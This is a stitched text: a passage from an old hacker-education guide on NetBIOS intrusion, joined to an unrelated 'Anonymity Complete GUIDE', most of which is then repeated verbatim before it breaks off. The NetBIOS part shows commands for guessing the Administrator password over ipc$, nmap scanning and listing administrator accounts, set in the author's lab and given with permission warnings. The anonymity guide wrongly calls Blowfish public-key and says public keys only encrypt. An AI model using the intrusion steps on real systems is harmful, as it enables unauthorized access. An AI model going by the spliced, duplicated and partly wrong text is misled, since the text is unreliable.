Some hackers might think that because ftproot is shared to the world that it is OK to download stuff from it. However, if someone were to log in properly to that ftp server, he or she would get the message "Welcome to Oldguy on Carolyn Meinel's LAN. Use is restricted to only those for whom Meinel has assigned a user name and password." This warning logon banner is all a computer owner needs to legally establish that no one is allowed to just break in. It won't impress a judge if a cracker says "The owner was so lame that her computer deserved to get broken into" or "I'm so lame that I forgot to try to use the ftp server the normal way."
More on the Net Commands
Let's get back to the net commands. There are many forms of this command. In XP you can learn about them with the command:
C:\>net help
The syntax of this command is:
NET HELP
command
-or-
NET command /HELP
Commands available are:
• NET ACCOUNTS
• NET HELP
• NET SHARE
NET COMPUTER
• NET HELPMSG
• NET START
• NET CONFIG
• NET LOCALGROUP
• NET STATISTICS
• NET CONFIG SERVER
• NET NAME
• NET STOP
• NET CONFIG WORKSTATION
• NET PAUSE
• NET TIME
• NET CONTINUE
• NET PRINT
• NET USE
• NET FILE
• NET SEND
• NET USER
• NET GROUP
• NET SESSION
• NET VIEW
• NET HELP SERVICES lists some of the services you can start.
• NET HELP SYNTAX explains how to read NET HELP syntax lines.
• NET HELP command | MORE displays Help one screen at a time.
How Crackers Break in as Administrator
As we look around Oldguy further, we see that there's not much else an anonymous user can do to it. We know that there is a user named Administrator. What can we do if we can convince Oldguy that we are Administrator?
******************
Newbie note: in Windows NT, 2000 and XP, the Administrator user has total power over its computer, just as root has total power over a Unix/Linux type computer. However, it is possible to change the name of Administrator so an attacker has to guess which user has all the power.
******************
Let's try to log in as Administrator by guessing the password. Give the command:
C:\>net use \\10.0.0.2\ipc$ * /user:Administrator
Type the password for \\10.0.0.2\ipc$:
System error 1219 has occurred.
Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
This means that someone else is currently logged onto this server who has Administrator rights. Furthermore, this person is probably watching me on an IDS and thinking up terrible things to do to me. Eeep! Actually this is all going on inside my hacker lab - but you get the idea of what it could be like when trying to invade a computer without permission.
I discover that whether I guess the password correctly or not, I always get the same error message. This is a good safety feature. On the other hand, one of the users is named Administrator. This is a bad thing for the defender. When you first set up a Windows NT or 2000 server, there is always a user called Administrator, and he or she has total power over that computer. If you know the all-powerful user is named Administrator, you can try guessing the password whenever no one is logged on with Administrator powers.
Computer criminals don't waste time guessing by hand. They use a program such as NAT or Legion to get passwords. These programs are why smart NT administrators rename their Administrator accounts and choose hard passwords. Also, this kind of persistent attack will be detected by an intrusion detection system, making it easy to catch criminals at work.
********************
You can get expelled warning: What if you are a student and you want to save your school from malicious code kiddies who steal tests and change grades? It is important to get permission *in writing* before you test the school's network. Even then, you still must be careful to be a model student. If you act up, cut classes - you know what I mean - the first time a cracker messes up the network, who do you think they will suspect? Yes, it's unfair, and yes, that is the way the world works.
********************
How to Scan for Computers that Use NetBIOS
Your tool of choice is a port scanner. Any computer that is running something on port 139 is likely (but not certain) to be using NetBIOS. Most crackers use nmap to port scan. This tool runs on Unix/Linux type computers. You can get it at
Here's an example of an nmap scan of Oldguy:
test-box:/home/cmeinel # nmap -sTU 10.0.0.2
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (10.0.0.2):
(The 3060 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
70/tcp open gopher
80/tcp open http
135/tcp open loc-srv
135/udp open loc-srv
137/udp open netbios-ns
138/udp open netbios-dgm
139/tcp open netbios-ssn
500/udp open isakmp
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
As you can see from this scan, three ports are identified with NetBIOS. This tells us that we could set nmap to scan a large number of Internet addresses, only looking for port 139 on each. To learn how to set up nmap to run this way, in your Unix or Linux shell give the command "man nmap".
For more on what crackers do once they break into a computer using NetBIOS (like installing back doors), see http://happyhacker.org/gtmhh/vol3no10.shtml
********************
You can get punched in the nose warning: if you use a port scanner against networks that haven't given you permission to scan, you will be waving a red flag that says "Whaddaya wanna bet I'm a computer criminal?" You can't get arrested for merely port scanning, but people who don't like being scanned might get you kicked off your Internet service provider.
You can get really, big time, punched in the nose warning: If you visit the same computer or LAN really often to see what's new and to try different things, even if you don't break the law you'd better be doing it with the permission of the owner. Otherwise you may make enemies who might crash or destroy your operating system. And that is only what they may do when feeling mellow. After a night of hard drinking - well, you don't want to find out.
********************
How to Play NetBIOS Wargames
What if you want to challenge your friends to a hacker wargame using NetBIOS? The first thing to do is *don't* email me asking me to break in for you. Sheesh. Seriously, almost every day I get emails from people claiming to have permission from their girlfriend/boyfriend and begging me to help them break in. You can read their hilarious pleas for help at http://happyhacker.org/sucks/ <../sucks/index.shtml> .
The way to run a hacker wargame over the Internet is first, get permission from your Internet provider so they don't kick you off for hacking. They probably run an IDS that scans users for suspicious activity. They probably hate malicious hackers. Enough said.
Second, you and your friends are likely to be at a different Internet address every time you log on. Your safest way to play over the Internet is for each player to get an Internet address that is the same every time he or she logs on: a "static" address. This way you won't accidentally break into someone else's computer.
You have to arrange with your Internet provider to get a static address. Normally only a local provider can do this for you. A big advantage of using a local provider is you can make friends with the people who work there - and they are probably hackers.
If you live in an apartment building or dormitory with other hackers, you can play break-in games without using the Internet. Set up a LAN where you can play together. For example, you can string Ethernet cable from window to window. To learn how to set up a Windows Ethernet LAN, see http://happyhacker.org/gtmhh/winlan.shtml .
Or you could set up a wireless LAN. With wireless you never know who might come cruising with a laptop down the street by your home or business and break in. That can make a wargame lots more fun. For help on how to break into wireless LANs (it's pathetically easy), see
**************
Evil genius tip: Attack using a Win NT server with the Microsoft Resource Kit installed. Heh, heh. With it you can give the command:
C:\>Local Administrators \\
This should show all user accounts with administrator rights on targetbox.com.
C:\>Global Administrators \\
This should show all user accounts with Domain administrative rights. These are exceptionally worth compromising, because with one Domain administrative password you will be able to control many resources among NT servers, workstations, and Win 95/98 computers.
I've tried to install the Resource Kit on XP Professional, but it wasn't compatible.
Another option is to install hacker tools such as Red Button and DumpACL, which extract information on user names, hashes, and which services are running on a given machine.
**************
Help for users of Windows 95, 98, SE or ME
To enable NetBIOS, click
Control Panel -> Network -> Protocols
If you see both NetBEUI and TCP/IP, you are already using NetBIOS. If not, add NetBEUI.
To bring up the command screen, click Start -> Run and type in command.com.
Anonymity Complete GUIDE By Theraider & Dangerous R.
Anonymity on the web
[ t a b l e o f c o n t e n t s ]
01 - table of contents
02 - introduction
03 - first tips
04 - about proxies
05 - cookies
06 - ftp transfers
07 - secure transactions
08 - SSL tunelling
09 - anonymity on irc
10 - mail crypto (and pgp usage)
11 - icq privacy
12 - spyware
13 - cleaning tracks
14 - ending words
[ introduction ]
Nowadays, everyone wants privacy on the web, because no matter where you go, someone could be watching you. Someone like your employer, someone trying to hack your system, companies gathering all your info to sell to yet other companies, or even the government, may be on your track while you peacefully surf the web. Thus, anonymity on the web means being able tu use all of its services with no concern about someone snooping on your data.
Your computer being connected to the net has an IP [Internet Protocol] address. If you have a dial-up connection, then your IP changes every time you connect to the internet (this is not always true, though. There are dialup isps, specially for university students, that do have static ips). Cable modems and DSL connections have a static IP, which means that the IP address does not change. One of the goals of getting anonymous is to make sure your ip, either static or dynamic) isn't revealed to other users of the internet, or to server administrators of the servers you roam around when using internet services.
This text tries to give you some hints on how to maintain your anonimity on the web. Some of the hints may sound banal, but think of, if you really abide them in every situation.
[ first tips ]
When chatting on IRC, ICQ, AIM (etc..), do not give out personal information about yourself, where you live, work, etc.
Do not use your primary email address (the one your ISP gave you) anywhere except to family members, close friends or trusted people. Instead create for yourself a web-based email account such as yahoo, hotmail, dynamitemail, mail.com, etc. and use this e-mail address to signing up for services, when in the need to give your mail to download something, or to publish on your homepage.
When signing up for services on the web, don't give your real information like address, phone number and such unless you really need to do so. This is the kind of information that information gathering companies like to get, so that they can sell out and fill your mailbox with spam.
Use an anonymous proxy to surf the web. This makes sure your ip doesn't get stored on the webserver logs. (Webservers log every GET request made, together with date, hour, and IP. This is where the proxy comes in. They get the ip from the proxy, not yours)
Use a bouncer to connect to IRC networks, in case you don't trust the administrators, or the other users. A bouncer is a program that sits on a permanently connected machine that allows you to connect there, and from there to the irc server, just like a proxy works for webservers.
Use anonymous remailers to send out your e-mails.
Cryptography can also help you by making sure the material you send out the web, like by email, etc, is cyphered, not allowing anyone that doesn't have your key to read it (in key-based cryptography). Programs like PGP (pretty good privacy) are toolkits with all you need to cypher and uncypher your stuff.
Delete traces of your work with the computer including history files, cache or backup files.
[ about proxies ]
Proxies are caches that relay data. When you configure your web browser to use a proxy, it never connects to the URL. Instead it always connects to the proxy server, and asks it to get the URL for you. It works similarly with other type of services such as IRC, ICQ etc. There'll won't be direct connection between you and the server, so your real IP address won't be revealed to the server. When you view a website on the server, the server won't see your IP. Some of web proxies do not support forwarding of the cookies whose support is required by some of the websites (for ex. Hotmail).
Here are some anonymous proxies that you can use to surf anonymously (notice that some of these may be a payed service):
Aixs - http://aixs.net/
Rewebber - http://www.anon.de/
Anonymizer - http://www.anonymizer.com/
The Cloak - http://www.the-cloak.com/
You'll highly probably find many websites that provide the lists of unauthorised proxies and remailers . Such lists are being compiled usually with the help of port scanners or exploit scanners, scanning for computers with wingate or other proxies' backdoors. Using these proxies is illegal, and is being considered as unauthorized access of computer. If you get such list to your hands, check if the info is legal or compiled by script kiddie, and act acordingly.
If you anyhow decide not to use proxy, at least do not forget to remove your personal information from your browser. After you remove details like your name and e-mail address from your browser, the only info a Web site can sniff out is your ISP's address and geographical location. Also Java and JavaScript applets can take control of your browser unexpectedly, and if you are surfing to unknown and potentially dangerous places you should be aware of that. There are exploitable browser bugs (mainly Internet explorer ones) reported ever week.
[ cookies ]
Maybe you're not aware of the fact that if you have the "allow cookies" feature in your browser on, websites can store all sorts of information on your harddrive. Cookies are small files that contain various kind of information that can be read bt websites when you visit them. The usual usage is to track demographics for advertising agencies that want to see just what kinds of consumers a certain site is attracting. Web sites also use cookies to keep your account information up-to-date. Then for instance when you visit your e-mail webbased account without being unlogged some hours later, you find yourself being logged on, even if you turn off your computer. Your login and password was simply stored on your harddrive in cookie file. This is security threat, in case that there is more persons who have the access to your computer.
Most of the browsers offer the possiblity to turn off the cookies, but some of sites like Hotmail.com require them to be turned on. In case you decided to allow cookies, at least never forget to log off from the websites when you're finishing visiting them.
[ ftp transfers ]
When using an FTP client program to download files, assure yourself, that it's giving a bogus password, like guest@unknown.com, not your real one. If your browser lets you, turn off the feature that sends your e-mail address as a password for anonymous FTP sessions.
[ secure transaction ]
Everything being sent from the web server to your browser is usually in plain text format. That means, all transferred information can be easily sniffed on the route. Some of the web servers support SSL (which stands for Secure Socket Layer). To view and use these websites you'll need SSL support in your browser as well. You recognize, that the connection is encrypted, if URL starts with https:// instead of usual http://. Never use web server without SSL for sending or receiving sensitive private or business information (credit card numbers, passwords etc.)
[ SSL tunelling ]
What is SSL?
SSL stands for Secure Socket Layer. The ?Secure? implies an encryption, while Socket Layer denotes an addition to the Window Socket system, Winsock. For those that don?t know, a Socket is an attachment to a port on a system. You can have many sockets on one port, providing they are non-blocking (allowing control to pass through to another socket aware application which wishes to connect to that port).
A Secure Socket Layer means that any sockets under it, are both secure and safe. The idea behind SSL was to provide an encrypted, and thus, secure route for traffic along a socket based system, such as TCP/IP (the internet protocol). Doing this allows security in credit card transactions on the Internet, encrypted and protected communiqué along a data line, and overall peace of mind.
The SSL uses an encryption standard developed by RSA. RSA are a world respected American organisation that specializes in encryption and data security. Initially, they developed a cipher length of only 40 bits, for use with the Secure Socket Layer, this was considered weak and therefore a longer much more complicated encryption cipher was created, 128 bits. The reasoning behind it was simple: it needs to be secure.
The RSA site puts the advantage of a longer encryption length pretty clearly: because 40-bit encryption is considered to be relatively weak. 128-bits is about 309 septillion times ( 309,485,000,000,000,000,000,000,000 ) larger than 40-bits. This would mean it would take that many times longer to crack or break 128-bit encryption than it would 40-bit.
If you want more information on the technicalities or RSA?s SSL encryption engine, visit their site: http://www.rsasecurity.com/standards/ssl.
But what does all this encryption and security have to do with you?
Well, that?s a simple question. No matter how hard you try, at times your privacy will need to be knowingly invaded so you can make use of the product offered for doing so. If you think about food, for example, one cannot eat without swallowing. When we wish to make a transaction or view a site on the internet, where we have to give enough information away so that it happens, we also want to be assured no one else along the line gathers that data. An encrypted session would mean our data is not at the hands of any privacy perpetrators unless they knew how to decode it ? and the only ones in the know, are those you specifically wish. SSL uses public key encryption as explained in the PGP section.
To put this at a head: if you use an encrypted connection or session, you can be relatively assured that there are no prying eyes along the way.
And how do I implement SSL with SSL Tunnelling?
We know that a Secure Socket Layer is safe, but what we don?t know is what a Tunnel is. In the most simplistic form, a tunnel is a proxy. Like proxy voting in general elections, a tunnel will relay your data back and forth for you. You may be aware though, that there are already ?proxies? out there, and yes, that is true. Tunnelling is done via proxies, but it is not considered to be the same as a standard proxy relaying simply because it isn?t.
Tunnelling is very special kind of proxy relay, in that it can, and does relay data without interfering. It does this transparently and without grievance or any care for what is passing its way.
Now, if we add this ability to ?tunnel? data, any data, in a pipe, to the Secure Sockets Layer, we have a closed connection that is independent of the software carrying it; and something that is also encrypted. For those of you wanting to know a little more about the technicalities, the SSL layer is also classless in the sense it does not interferer with the data passed back and forth ? after all, it is encrypted and impossible to tamper with. That attribute means an SSL capable proxy is able to transfer data out of its ?proxied? connection to the destination required.
So to sum up, we have both a secure connection that does the job and relays things in the right direction; and we have direct tunnel that doesn?t care what we pass through it. Two very useful, and almost blind entities. All we need now is a secure proxy that we can use as the tunnel.
Proxies:
Secure proxies are alike standard proxies. We can either use an HTTP base SSL equipped proxy - one specifically designed for security HTTP traffic, but because of the ignorant nature of SSL communication, it can be bent to any needs ? or we can use a proper SSL service designed for our connection ? like you would use a secure NNTP (news) program with a secure proxy on port 563 instead of taking our long way - which would probably work as well.
A secure HTTP proxy operates on port 443. Host proxies are not public, that means they operate for, and allow only traffic from their subnet or the ISP that operates them ? but, there are many badly configured HTTP proxies and some public ones out there. The use of a program called HTTrack (available on Neworder) will aid you in scanning and searching for proxies on your network or anywhere on the Internet if your ISP does not provide you with one.
Neworder also features a number of sites dedicated to listing public proxies in the Anonymity section. While it?s often hard to find a suitable fast proxy, it?s worth the effort when you get one.
So how can I secure my connections with SSL Tunnelling?
That?s a big question, and beyond the scope out this tuition as it must come to and end. I can however, point you in the right direction of two resources that will aid you in tunnelling both IRC, and most other connections via a HTTP proxy.
For Windows, the first stop would be http://www.totalrc.net?s Socks2HTTP. This is an SSL tunnelling program that turns a normal socks proxy connection into a tunnelled SSL connection.
The second stop, for both Windows and Unix is stunnel. Stunnel is a GNU kit developed for SSL tunnelling any connection. It is available for compile and download as binary here: Stunnel homepage - http://mike.daewoo.com.pl/computer/stunnel
[ anonymity on irc ]
A BNC, or a Bouncer - is used in conjunction with IRC as a way of hiding your host when people /whois you. On most IRC networks, your host isnt masked when you whois, meaning the entire IP appears, like 194.2.0.21, which can be resolved. On other networks, your host might be masked, like IRCnetwork-0.1 but it can still give valuable information, like nationality if your host is not a IP, but a DNS resolved host, like my.host.cn would be masked to IRCnetwork-host.cn but this would still tell the person who whoised you, that you are from China.
To keep information such as this hidden from the other users on an IRC network, many people use a Bouncer, which is actually just a Proxy. Let us first draw a schematic of how a normal connection would look, with and without a BNC installed.
Without a BNC:
your.host.cn <<-->> irc.box.sk
With a BNC:
your.host.cn <<-->> my.shell.com <<-->> irc.box.sk
You will notice the difference between the two. When you have a BNC installed, a shell functions as a link between you and the IRC server (irc.box.sk as an example). You install a BNC on a shell, and set a port for it to listen for connections on. You then login to the shell with your IRC client, BitchX/Xchat/mIRC, and then it will login to the IRC server you specify - irc.box.sk in this case. In affect, this changes your host, in that it is my.shell.com that makes all the requests to irc.box.sk, and irc.box.sk doesn't know of your.host.cn, it has never even made contact with it.
In that way, depending on what host your shell has, you can login to IRC with a host like i.rule.com, these vhosts are then actually just an alias for your own machine, your.host.cn, and it is all completely transparent to the IRC server.
Many servers have sock bots that check for socket connections. These aren't BNC connections, and BNC cannot be tested using a simple bot, unless your shell has a socket port open (normally 1080) it will let you in with no problem at all, the shell is not acting as a proxy like you would expect, but more as a simple IRC proxy, or an IRC router. In one way, the BNC just changes the packet and sends it on, like:
to: my.shell.com -> to: irc.box.sk -> to: my.shell.com from: your.host.cn <- from: my.shell.com <- from: irc.box.sk The BNC simply swaps the host of your packet, saying it comes from my.shell.com. But also be aware, that your own machine is perfectly aware that it has a connection established with my.shell.com, and that YOU know that you are connected to irc.box.sk. Some BNCs are used in IRC networks, to simulate one host. If you had a global IRC network, all linked together, you could have a local server called: cn.myircnetwork.com which Chinese users would log into. It would then Bounce them to the actual network server, in effect making all users from china have the same host - cn.myircnetwork.com, masking their hosts. Of course, you could change the host too - so it didn't reveal the nationality, but it is a nice gesture of some networks, that they mask all hosts from everyone, but it makes life hard for IRCops on the network - but its a small price to pay for privacy. Note: Even if you do use IRC bouncer, within DCC transfers or chat, your IP will be revealed, because DCC requires direct IP to IP connection. Usual mistake of IRC user is to have DCC auto-reply turned on. For an attacker is then easy to DCC chat you or offer you a file, and when IRC clients are connected, he can find out your IP address in the list of his TCP/IP connections (netstat). How do I get IRC bouncer? you download and install bouncer software, or get someone to install it for you (probably the most known and best bouncer available is BNC, homepage : http://gotbnc.com/) you configure and start the software - in case it's bouncer at Unix machine, you start it on your shell account (let's say shell.somewhere.com) you open IRC and connect to the bouncer at shell.somewhere.com on the port you told it to start on. all depending on the setup, you may have to tell it your password and tell it where to connect, and you're now on irc as shell.somewhere.com instead of your regular hostname [ mail crypto ] Usually the safest way to ensure that your e-mail won't be read by unauthorised persons is to encrypt them. To be compatible with the rest of the world I'd suggest to use free PGP software. PGP (Pretty Good Privacy) is a piece of software, used to ensure that a message/file has not been changed, has not been read, and comes from the person you think it comes from. Download location: http://www.pgpi.org/ How does pgp Work? The whole idea behind PGP is that of Public and Private keys. To explain the algorithm PGP uses in order to encrypt the message would take too much time, and is beyond the scope of this, we will however look at how it ensures the integrity of the document. A user has a password, this password has to be chosen correctly, so don't choose passwords like "pop" or "iloveyou", this will make an attack more likely to succeed. The password is used to create a private key, and a public key - the algorithm ensures that you can not use the public key to make the private key. The public key is sent to a server, or to the people you send e-mails/files, and you keep the private key secret. We will use a few terms and people in this introduction, they are: Pk - Public Key, Sk - Secret Key (private key). Adam will send an e-mail to Eve, and Rita will be a person in between, who we are trying to hide the content of the mail from. Rita will intercept the email (PGP doesn't ensure that Rita cant get her hands on the package, she can - its not a secure line like other technologies) and try to read it/modify it. Adam has a Sk1 and a Pk1, and Eve has a Sk2 and a Pk2. Both Adam, Eve, and Rita have Pk1 and Pk2, but Sk1 and Sk2 are presumed to be totally secret. First, here is a schematic of how it all looks: PUBLIC SERVER Pk1, Pk2 Adam <------------------------------------------> Eve Sk1 ^ Sk2
|
|
|
|
Rita
So Adam wants to send a packet to Eve, without Rite reading it, or editing it. There are three things that we need to make sure:
That Rita cant read the text without permission
That Rita cant edit it in any way, without Eve and Adam knowing
That Even knows that Adam sent it
First thing is making sure Rita cant read the text. Adam does this by encrypting the message with Eves Pk2 which he has found on the server. You can only Encrypt with the Pk, not decrypt, so Rita wont be able to read the data unless Eve has revealed her Sk2.
The second thing to make sure, is that Rite cant edit the message. Adam creates a hash from the message he has created. The hash can be encrypted using Pk2, or sent as it is. When Eve gets the message, she decrypts it, and creates a hash herself, then checks if the hashes are the same - if they are, the message is the same, if its different, something has changed in the message. The Hash is very secure, and it is in theory impossible to make a change, and get the hash to remain the same.
The third, and probably one of the most important things to ensure, is that Rita hasn't grabbed the mail, made a new one, and sent it in Adams name. We can ensure this by using Public key and Private key too. The Sk can be used both to encrypt and to decrypt, but Pk can only encrypt. When Adam normally sends a message M to Eve, he creates the encrypted message C by doing: C=Pk2(M). This means, Adam uses Pk2 (Eves Pk) on message M to create message C. Image this: Adam can encrypt the message with his Sk1, because it is impossible to derive Sk1 from the message, this is secure and without any danger, as long as no one knows the password used to make Sk1 with. If the message M is encrypted with Sk1, he gets a message called X, Eve can decrypt the message using Pk1 which is public. If the message decrypts to something that makes sence, then it must be from Adam, because Sk1 is considered as secret, and only Adam knows it.
The entire process looks like this, when sending message C: Adam signs his digital signature on C, and hashes C: X=Sk1(C). Then Adam encrypts the message for Eve: M=Pk2(X). The message is sent, and looks all in all like this: M=Pk2(Sk1(C)). Rita can intercept M, but not decrypt, edit, or resend it. Eve receives M, and decrypts it: X=Sk2(M). Then she checks the digital signature: C=Pk1(X) and checks the Hash on the way.
This way, the PGP Public/Private key system ensures integrity and security of the document e-mail, but PGP is not the only algorithm that uses the Public/Private key theory, Blowfish, and RSA are among the many other technologies that use it, PGP is just the most popular for e-mail encryption, but many don't trust it because of rumors of backdoors by the NSA (I don't know if its true though). PGP comes in a commercial, and a freeware version for Windows, and is available for Linux as well. What ever encryption you use, it will be better than none.
[ anonymous remailers ]
Remailers are programs accessible on the Internet that route email and USENET postings anonymously (i.e., the recipient cannot determine who sent the email or posted the article). This way the sender can't be traced back by routing headers included in the e-mail. There are different classes of remailers, which allow anonymous exchange of email and anonymous posting to USENET and often many other useful features.
Resources:
Chain is a menu-driven remailer-chaining script:
http://www.obscura.com/crypto.html
Raph Levien's remailer availability page offers comprehensive information about the subject
http://www.sendfakemail.com/~raph/remailer-list.html
The Cypherpunks Remailers are being developed to provide a secure means of providing anonymity on the nets. Here you can find out about the available remailers, those which have been standard in existance for a long time as well as the new experimental remailers and anonymous servers.
http://www.csua.berkeley.edu/cypherpunks/remailer/
[ icq privacy ]
How can I keep my privacy at ICQ?
Send and receive messages via ICQ server, not directly. Every direct connection enables attacker to learn your IP. Encrypt your messages by dedicated software, encryption addons.
How to encrypt ICQ messages?
There are addons which enhance your ICQ with possibility to encrypt outcoming messages. The user on the other side needs to have the addon as well in order to decrypt your message.
Resources:
http://www.encrsoft.com/products/tsm.html
Top Secret Messenger (TSM) - trial version has only weak 8-bit encryption
http://www.planet-express.com/sven/technical/dev/chatbuddy/default.html
Chat Buddy - a freeware Windows application for encrypting chat sessions
http://www.algonet.se/~henisak/icq/encrypt-v5.txt
how encryption works in ICQ protocol v5
[ spyware ]
As we all work hard to become more savvy about protecting our personal information and keeping as anonymous as possible on the web, advertising companies are working just as hard to come up with new ways of getting our personal information. One of the ways they accomplish this is through spyware.
Spyware are applications that are bundled along with many programs that you download for free. Their function is to gather personal information about you and relay it back to advertising firms. The information is then used either to offer you products or sold to other advertisers, so they can promote THEIR products. They claim this is all they do with this information, but the problem is nobody really knows for sure.
Spyware fits the classic definition of a trojan, as it is something that you did not bargain for+when you agreed to download the product. Not only is spyware an invasion of your privacy, but (especially if you have a few different kinds on your machine) it can also chew up bandwidth, making your internet connection slower.
Sometimes, these spies really are harmless, merely connecting back to the home server to deliver+you more advertising. Some, like Gator for instance, send out detailed information about your surfing habits, operating system, income, age demographic et cetera.
Avoiding spyware
Avoiding spyware is getting harder and harder, as more software distributors are choosing it as a method of profiting from freeware and shareware distributions. Be leery of programs with cute+little icons like Gator. Also, watch those Napster wannabes like AudioGalaxy, Limewire, and Kazaa. I've yet to find one that didn't include spyware. Before you download, check to see if the program is known to contain spyware.
For a list of most known spyware, the best I've found is here:
http://www.infoforce.qc.ca/spyware/enknownlistfrm.html
Getting rid of spyware
In most cases, you can remove the spyware from your system and still use the application you downloaded. In the case of Gator and Comet Cursor, the the whole program is spyware an it must be completely removed to stop the spying.
There are several ways to get rid of spyware on your system. You can use a firewall to monitor outgoing connections. The programmers that put these things together, however, are getting sneakier and sneakier about getting them to circumvent firewalls. Comet Cursor, for instance uses an HTTP post command to connect without the intervention of a firewall. You can also install a registry monitor such as Regmon to monitor your registry for unwanted registry registry changes, but this is not foolproof either.
Probably the best method of removal is to download a spyware removal program and run it like it was a virus scanner. The best examples of these programs are:
Lavasoft's Adaware. Available at http://www.lavasoftusa.com/ Or professional cybernut Steve Gibson's OptOut. Available at: http://grc.com/optout.htm Both of these programs are free and are updated regularly.
Here are some links, if you wish to learn more about spyware:
http://www.spychecker.com/
http://grc.com/optout.htm
http://www.thebee.com/bweb/iinfo200.htm
[ cleaning tracks ]
Resources:
Burnt Cookies - allows automatic detection and optional deletion of Cookies deposited by Banner Ad web-sites
http://www.andersson-design.com/bcookies/index.shtml
Surfsecret - automatically kills files like your Internet cache files, cookies, history, temporary files, recent documents, and the contents of the Recycle Bin.
http://www.surfsecret.com/
Note: One sidenote on cleaning tracks. When you delete some files on your machine, these aren't actually deleted. Only the reference to their location in the hard drive is deleted, which makes the OS think that that location on the HD is free and ready to take things. Thus, there are ways to recover data even after you delete them.
There are however, several ways to _wipe_ this information. Programs that fill hard disk locations with zeros, then with 1s, on several passes are your best bet to make sure no document goes to the wrong hands. One of such programs is PGP. PHPi now comes with a utility that does this work, and you can even select the number of passes to wipe files. For *nix, there is also the "wipe" program. Use these when you feel you have data that needs secure cleaning.
[ t a b l e o f c o n t e n t s ]
01 - table of contents
02 - introduction
03 - first tips
04 - about proxies
05 - cookies
06 - ftp transfers
07 - secure transactions
08 - SSL tunelling
09 - anonymity on irc
10 - mail crypto (and pgp usage)
11 - icq privacy
12 - spyware
13 - cleaning tracks
14 - ending words
[ introduction ]
Nowadays, everyone wants privacy on the web, because no matter where you go, someone could be watching you. Someone like your employer, someone trying to hack your system, companies gathering all your info to sell to yet other companies, or even the government, may be on your track while you peacefully surf the web. Thus, anonymity on the web means being able tu use all of its services with no concern about someone snooping on your data.
Your computer being connected to the net has an IP [Internet Protocol] address. If you have a dial-up connection, then your IP changes every time you connect to the internet (this is not always true, though. There are dialup isps, specially for university students, that do have static ips). Cable modems and DSL connections have a static IP, which means that the IP address does not change. One of the goals of getting anonymous is to make sure your ip, either static or dynamic) isn't revealed to other users of the internet, or to server administrators of the servers you roam around when using internet services.
This text tries to give you some hints on how to maintain your anonimity on the web. Some of the hints may sound banal, but think of, if you really abide them in every situation.
[ first tips ]
When chatting on IRC, ICQ, AIM (etc..), do not give out personal information about yourself, where you live, work, etc.
Do not use your primary email address (the one your ISP gave you) anywhere except to family members, close friends or trusted people. Instead create for yourself a web-based email account such as yahoo, hotmail, dynamitemail, mail.com, etc. and use this e-mail address to signing up for services, when in the need to give your mail to download something, or to publish on your homepage.
When signing up for services on the web, don't give your real information like address, phone number and such unless you really need to do so. This is the kind of information that information gathering companies like to get, so that they can sell out and fill your mailbox with spam.
Use an anonymous proxy to surf the web. This makes sure your ip doesn't get stored on the webserver logs. (Webservers log every GET request made, together with date, hour, and IP. This is where the proxy comes in. They get the ip from the proxy, not yours)
Use a bouncer to connect to IRC networks, in case you don't trust the administrators, or the other users. A bouncer is a program that sits on a permanently connected machine that allows you to connect there, and from there to the irc server, just like a proxy works for webservers.
Use anonymous remailers to send out your e-mails.
Cryptography can also help you by making sure the material you send out the web, like by email, etc, is cyphered, not allowing anyone that doesn't have your key to read it (in key-based cryptography). Programs like PGP (pretty good privacy) are toolkits with all you need to cypher and uncypher your stuff.
Delete traces of your work with the computer including history files, cache or backup files.
[ about proxies ]
Proxies are caches that relay data. When you configure your web browser to use a proxy, it never connects to the URL. Instead it always connects to the proxy server, and asks it to get the URL for you. It works similarly with other type of services such as IRC, ICQ etc. There'll won't be direct connection between you and the server, so your real IP address won't be revealed to the server. When you view a website on the server, the server won't see your IP. Some of web proxies do not support forwarding of the cookies whose support is required by some of the websites (for ex. Hotmail).
Here are some anonymous proxies that you can use to surf anonymously (notice that some of these may be a payed service):
Aixs - http://aixs.net/
Rewebber - http://www.anon.de/
Anonymizer - http://www.anonymizer.com/
The Cloak - http://www.the-cloak.com/
You'll highly probably find many websites that provide the lists of unauthorised proxies and remailers . Such lists are being compiled usually with the help of port scanners or exploit scanners, scanning for computers with wingate or other proxies' backdoors. Using these proxies is illegal, and is being considered as unauthorized access of computer. If you get such list to your hands, check if the info is legal or compiled by script kiddie, and act acordingly.
If you anyhow decide not to use proxy, at least do not forget to remove your personal information from your browser. After you remove details like your name and e-mail address from your browser, the only info a Web site can sniff out is your ISP's address and geographical location. Also Java and JavaScript applets can take control of your browser unexpectedly, and if you are surfing to unknown and potentially dangerous places you should be aware of that. There are exploitable browser bugs (mainly Internet explorer ones) reported ever week.
[ cookies ]
Maybe you're not aware of the fact that if you have the "allow cookies" feature in your browser on, websites can store all sorts of information on your harddrive. Cookies are small files that contain various kind of information that can be read bt websites when you visit them. The usual usage is to track demographics for advertising agencies that want to see just what kinds of consumers a certain site is attracting. Web sites also use cookies to keep your account information up-to-date. Then for instance when you visit your e-mail webbased account without being unlogged some hours later, you find yourself being logged on, even if you turn off your computer. Your login and password was simply stored on your harddrive in cookie file. This is security threat, in case that there is more persons who have the access to your computer.
Most of the browsers offer the possiblity to turn off the cookies, but some of sites like Hotmail.com require them to be turned on. In case you decided to allow cookies, at least never forget to log off from the websites when you're finishing visiting them.
[ ftp transfers ]
When using an FTP client program to download files, assure yourself, that it's giving a bogus password, like guest@unknown.com, not your real one. If your browser lets you, turn off the feature that sends your e-mail address as a password for anonymous FTP sessions.
[ secure transaction ]
Everything being sent from the web server to your browser is usually in plain text format. That means, all transferred information can be easily sniffed on the route. Some of the web servers support SSL (which stands for Secure Socket Layer). To view and use these websites you'll need SSL support in your browser as well. You recognize, that the connection is encrypted, if URL starts with https:// instead of usual http://. Never use web server without SSL for sending or receiving sensitive private or business information (credit card numbers, passwords etc.)
[ SSL tunelling ]
What is SSL?
SSL stands for Secure Socket Layer. The ?Secure? implies an encryption, while Socket Layer denotes an addition to the Window Socket system, Winsock. For those that don?t know, a Socket is an attachment to a port on a system. You can have many sockets on one port, providing they are non-blocking (allowing control to pass through to another socket aware application which wishes to connect to that port).
A Secure Socket Layer means that any sockets under it, are both secure and safe. The idea behind SSL was to provide an encrypted, and thus, secure route for traffic along a socket based system, such as TCP/IP (the internet protocol). Doing this allows security in credit card transactions on the Internet, encrypted and protected communiqué along a data line, and overall peace of mind.
